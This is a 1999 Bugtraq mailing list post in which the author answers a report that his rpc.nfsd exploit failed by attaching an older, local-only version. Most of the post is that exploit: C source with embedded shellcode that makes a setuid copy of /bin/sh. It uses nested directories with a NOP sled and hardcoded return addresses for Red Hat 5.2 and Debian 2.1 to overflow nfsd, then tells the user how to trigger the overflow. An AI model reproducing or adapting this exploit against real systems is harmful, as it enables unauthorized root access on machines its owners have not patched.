Bugtraq mailing list archives
Re: rpc.nfsd exploit code
From: tmogg () ZIGZAG PL (Mariusz Marcinkiewicz)
Date: Fri, 12 Nov 1999 09:07:02 +0100
Hi On Thu, 11 Nov 1999, Crispin Cowan wrote:
We were unable to get this sploit to actually produce a root shell on an unprotected nfsd.
Sorry, this version of exploit wasn't tested well. Maybe it doesn't work in some cases. I attached old version of rpc.nfsd exploit. This one is local only, shellcode will make "chown root /tmp/blah; chmod +s /tmp/blah". It should works for you. best regards, tmoggie __ Mariusz Marcinkiewicz | phone: +48 601 080 286 | mail: many () rast lodz pdi net System Administrator && Tech Support <tmogg () zigzag pl> http://www.zigzag.pl Security Advisor [*] tmogg () hert org || tmogg () hack dk [*] http://www.hert.org /* * rpc.nfsd exploit for Linux * * author: tmoggie * greetz: * DiGiT - bug discovering, * kil3r, maxiu and all of lam3rZ GrP * */ #include <sys/stat.h> #include <sys/types.h> #include <fcntl.h> #include <unistd.h> #include <string.h> #define green "\E[32m" #define bold "\E[1m" #define normal "\E[m" #define red "\E[31m" // shellcode from maxiu // chmod 4777 /tmp/blah char shell[] = "\xeb\x2d\x5e\xfe\x06\xfe\x46\x04\xfe\x46\x09\x31\xc9\x31\xdb" "\x31\xc0\xb0\x46\xcd\x80\x31\xd2\x89\xf3\xb0\x10\xcd\x80\x66" "\xb9\xff\x09\x89\xf3\xb0\x0f\xcd\x80\x31\xdb\x89\xd8\xfe\xc0" "\xcd\x80\xe8\xce\xff\xff\xff.tmp.blah\xff\xff\xff\xff/"; char *cmd = "cp /bin/sh /tmp/blah"; int offset; void usage(char *prog) { printf("\nusage: %s <-e dir> [-t target] [-c command] \n",prog); printf("\n -e dir : full path to exported directory\n"); printf(" -t target : "); printf("1 - RH 5.2 (default) 2 - Debian 2.1\n"); printf(" -c command: cmd to do as a normal user" \ " (default: cp /bin/sh /tmp/blah)\n\n"); exit(0); } void main(int argc, char **argv) { int i,j; char buf[4096]; char buf2[4096]; char tmp[4096]; char exp[255] = "!"; int addr = 0xbffff667 ; // default RH 5.2 while (1) { i = getopt(argc,argv,"e:c:t:h"); if (i == -1) break; switch (i) { case 'e': strcpy(exp,optarg); break; case 'c': strcpy(cmd,optarg); break; case 't': switch (j=atoi(optarg)) { case 1: addr = 0xbffff667; break; // debian 1.2 case 2: addr = 0xbffff655; break; // rh 5.2 } default : usage(argv[0]); break; } } if (!strcmp(exp,"!")) usage(argv[0]); printf(bold"cmd"); if (system(cmd) != 0) { printf(red"....failed!\n"normal); exit(-1); } printf(normal green"\tOk\n"normal); offset = strlen(exp); if (exp[offset-1] != '/') strcat(exp,"/"); offset = strlen(exp); bzero(buf,sizeof(buf)); memset(tmp,'A',255); tmp[255]='/'; tmp[256]='\0'; strncpy(buf,exp,offset); printf(bold"dirs"); for (i=1;i<=3;i++) { strncat(buf,tmp,strlen(tmp)); if (mkdir(buf,0777) < 0) { printf(red"...fuck! can't create directory!!! : %d\n"normal,i); exit(-1); } } memset(tmp,'A',255); tmp[255-offset]='/'; tmp[256-offset]='\0'; strncat(buf,tmp,strlen(tmp)); if (mkdir(buf,0777) < 0) { printf(red"...fuqn offset dirW#$#@%#$^%T#\n"normal); exit(-1); } memset(tmp,'\x90',255); strcpy(tmp+(255-strlen(shell)),shell); strncat(buf,tmp,strlen(tmp)); if (mkdir(buf,0777) < 0) { printf(red"...fuck!@# shell-dir\n"normal); exit(-1); } memset(tmp,'a',255); tmp[97] = '\0'; *((int*)(tmp+93)) = addr; strncat(buf,tmp,strlen(tmp)); if (mkdir(buf,0777) < 0) { printf(red"...fuck!@#!@#!$ addrez-dir ^\n"normal); exit(-1); } printf(normal green"\tOk\n"normal); printf("now you have to do: "bold green \ "rm -rf /path-to-mount-point/A[tab] & \n\n"normal); }
Current thread:
- Security flaw in Cobalt RaQ2 cgiwrap Chris Adams (Nov 08)
- Irfan view 3.07 buffer overflow UNYUN (Nov 08)
- Re: Security flaw in Cobalt RaQ2 cgiwrap Nathan Neulinger (Nov 08)
- Re: Security flaw in Cobalt RaQ2 cgiwrap Chris Adams (Nov 09)
- undocumented bugs - nfsd Mariusz Marcinkiewicz (Nov 09)
- Re: undocumented bugs - nfsd Olaf Kirch (Nov 10)
- rpc.nfsd exploit code Mariusz Marcinkiewicz (Nov 10)
- Re: rpc.nfsd exploit code Crispin Cowan (Nov 11)
- WU-FTPD Mnemonix (Nov 11)
- Re: WU-FTPD hayward () SLOTHMUD ORG (Nov 12)
- Re: rpc.nfsd exploit code Mariusz Marcinkiewicz (Nov 12)
- Re: rpc.nfsd exploit code Rogier Wolff (Nov 12)
- Re: undocumented bugs - nfsd Olaf Kirch (Nov 10)
- BIND NXT Bug Vulnerability Elias Levy (Nov 10)
- Re: BIND NXT Bug Vulnerability Richard Trott (Nov 10)
- Re: BIND NXT Bug Vulnerability Mike Iglesias (Nov 10)
- [RHSA-1999:053-01] new NFS server pacakges available (5.2, 4.2) Bill Nottingham (Nov 10)
- Re: [linux-security] Re: undocumented bugs - nfsd Olaf Kirch (Nov 11)
- SmartServer3 POP3 BindView Advisory (Nov 11)
- THE 12th ANNUAL FIRST CONFERENCE on COMPUTER SECURITY michele sensalari (Nov 11)
- OS/390 Interlink Stack DoS with nmap bugz () NAZGUL COM (Nov 11)
- Re: OS/390 Interlink Stack DoS with nmap bugz () NAZGUL COM (Nov 17)